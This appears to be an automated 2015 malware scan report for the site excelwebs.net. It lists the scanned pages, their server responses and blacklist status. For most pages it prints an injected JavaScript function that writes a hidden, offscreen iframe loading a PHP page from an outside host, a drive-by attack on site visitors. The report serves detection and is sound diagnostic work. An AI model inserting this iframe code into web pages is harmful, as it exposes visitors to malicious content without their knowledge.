Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=excelwebs.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://excelwebs.net/ | 200 OK Content-Length: 9322 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function vo09() { var static='ajax'; var controller='index.php'; var vo = document.createElement('iframe'); vo.src = 'http://www.parafuneraria.com/components/VhtYpGPD.php'; vo.style.position = 'absolute'; vo.style.color = '81'; vo.style.height = '81px'; vo.style.width = '81px'; vo.style.left = '100081'; vo.style.top = '100081'; if (!document.getElementById('vo')) { document.write('<p id=\'vo\' class=\'vo09\' ></p>'); document.getElementById('vo').appendChild(vo); }}function SetCookie Antivirus reports:
| ||
http://excelwebs.net/index.html | 200 OK Content-Length: 9322 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function vo09() { var static='ajax'; var controller='index.php'; var vo = document.createElement('iframe'); vo.src = 'http://www.parafuneraria.com/components/VhtYpGPD.php'; vo.style.position = 'absolute'; vo.style.color = '81'; vo.style.height = '81px'; vo.style.width = '81px'; vo.style.left = '100081'; vo.style.top = '100081'; if (!document.getElementById('vo')) { document.write('<p id=\'vo\' class=\'vo09\' ></p>'); document.getElementById('vo').appendChild(vo); }}function SetCookie Antivirus reports:
| ||
http://excelwebs.net/services.html | 200 OK Content-Length: 9583 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function vo09() { var static='ajax'; var controller='index.php'; var vo = document.createElement('iframe'); vo.src = 'http://www.parafuneraria.com/components/VhtYpGPD.php'; vo.style.position = 'absolute'; vo.style.color = '81'; vo.style.height = '81px'; vo.style.width = '81px'; vo.style.left = '100081'; vo.style.top = '100081'; if (!document.getElementById('vo')) { document.write('<p id=\'vo\' class=\'vo09\' ></p>'); document.getElementById('vo').appendChild(vo); }}function SetCookie Antivirus reports:
| ||
http://excelwebs.net/portfolio.html | 200 OK Content-Length: 12951 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function vo09() { var static='ajax'; var controller='index.php'; var vo = document.createElement('iframe'); vo.src = 'http://www.parafuneraria.com/components/VhtYpGPD.php'; vo.style.position = 'absolute'; vo.style.color = '81'; vo.style.height = '81px'; vo.style.width = '81px'; vo.style.left = '100081'; vo.style.top = '100081'; if (!document.getElementById('vo')) { document.write('<p id=\'vo\' class=\'vo09\' ></p>'); document.getElementById('vo').appendChild(vo); }}function SetCookie Antivirus reports:
| ||
http://excelwebs.net/hosting | 404 Not Found Content-Length: 324 Content-Type: text/html | clean |
http://excelwebs.net/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://excelwebs.net/contact.html | 200 OK Content-Length: 9583 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function vo09() { var static='ajax'; var controller='index.php'; var vo = document.createElement('iframe'); vo.src = 'http://www.parafuneraria.com/components/VhtYpGPD.php'; vo.style.position = 'absolute'; vo.style.color = '81'; vo.style.height = '81px'; vo.style.width = '81px'; vo.style.left = '100081'; vo.style.top = '100081'; if (!document.getElementById('vo')) { document.write('<p id=\'vo\' class=\'vo09\' ></p>'); document.getElementById('vo').appendChild(vo); }}function SetCookie Antivirus reports:
| ||
http://excelwebs.net/portfolio/majorleaguestrength | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 08:53:23 GMT Location: http://excelwebs.net/portfolio/majorleaguestrength/ Server: nginx Content-Length: 259 Content-Type: text/html; charset=iso-8859-1 Ngpass_ngall: 1 | clean |
http://excelwebs.net/portfolio/majorleaguestrength/ | 200 OK Content-Length: 13679 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function vo09() { var static='ajax'; var controller='index.php'; var vo = document.createElement('iframe'); vo.src = 'http://www.parafuneraria.com/components/VhtYpGPD.php'; vo.style.position = 'absolute'; vo.style.color = '81'; vo.style.height = '81px'; vo.style.width = '81px'; vo.style.left = '100081'; vo.style.top = '100081'; if (!document.getElementById('vo')) { document.write('<p id=\'vo\' class=\'vo09\' ></p>'); document.getElementById('vo').appendChild(vo); }}function SetCookie Antivirus reports:
| ||
http://www.majorleaguestrength.com/email_list_lite/email_list_style_1.js | 500 Can't connect to www.majorleaguestrength.com:80 Content-Length: 202 Content-Type: text/plain | clean |
http://excelwebs.net/portfolio/mtyedjs | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 08:53:24 GMT Location: http://excelwebs.net/portfolio/mtyedjs/ Server: nginx Content-Length: 247 Content-Type: text/html; charset=iso-8859-1 Ngpass_ngall: 1 | clean |
http://excelwebs.net/portfolio/mtyedjs/ | 200 OK Content-Length: 418 Content-Type: text/html | clean |
http://excelwebs.net/portfolio/ | 200 OK Content-Length: 368 Content-Type: text/html | clean |
http://excelwebs.net/portfolio/_i.php | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://excelwebs.net/portfolio/angelo%20venuto%20-%20sweet%20caroline%20(good%20remix).mp3 | 404 Not Found Content-Length: 374 Content-Type: text/html | clean |
http://excelwebs.net/soap | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 08:53:26 GMT Location: http://excelwebs.net/soap/ Server: nginx Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 Ngpass_ngall: 1 | clean |
http://excelwebs.net/soap/ | 200 OK Content-Length: 3373 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function vo09() { var static='ajax'; var controller='index.php'; var vo = document.createElement('iframe'); vo.src = 'http://www.parafuneraria.com/components/VhtYpGPD.php'; vo.style.position = 'absolute'; vo.style.color = '81'; vo.style.height = '81px'; vo.style.width = '81px'; vo.style.left = '100081'; vo.style.top = '100081'; if (!document.getElementById('vo')) { document.write('<p id=\'vo\' class=\'vo09\' ></p>'); document.getElementById('vo').appendChild(vo); }}function SetCookie Antivirus reports:
| ||
http://excelwebs.net/clansite/ | 404 Not Found Content-Length: 326 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: excelwebs.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 08:53:20 GMT
Accept-Ranges: bytes
Server: nginx
Vary: Accept-Encoding
Content-Length: 9322
Content-Type: text/html
Last-Modified: Tue, 13 May 2014 13:36:49 GMT
Ngpass_ngall: 1
...9322 bytes of data.
GET / HTTP/1.1
Host: excelwebs.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 08:53:20 GMT
Accept-Ranges: bytes
Server: nginx
Vary: Accept-Encoding
Content-Length: 9322
Content-Type: text/html
Last-Modified: Tue, 13 May 2014 13:36:49 GMT
Ngpass_ngall: 1
...9322 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: excelwebs.net
Referer: http://www.google.com/search?q=excelwebs.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: excelwebs.net
Referer: http://www.google.com/search?q=excelwebs.net
Result:
The result is similar to the first query. There are no suspicious redirects found.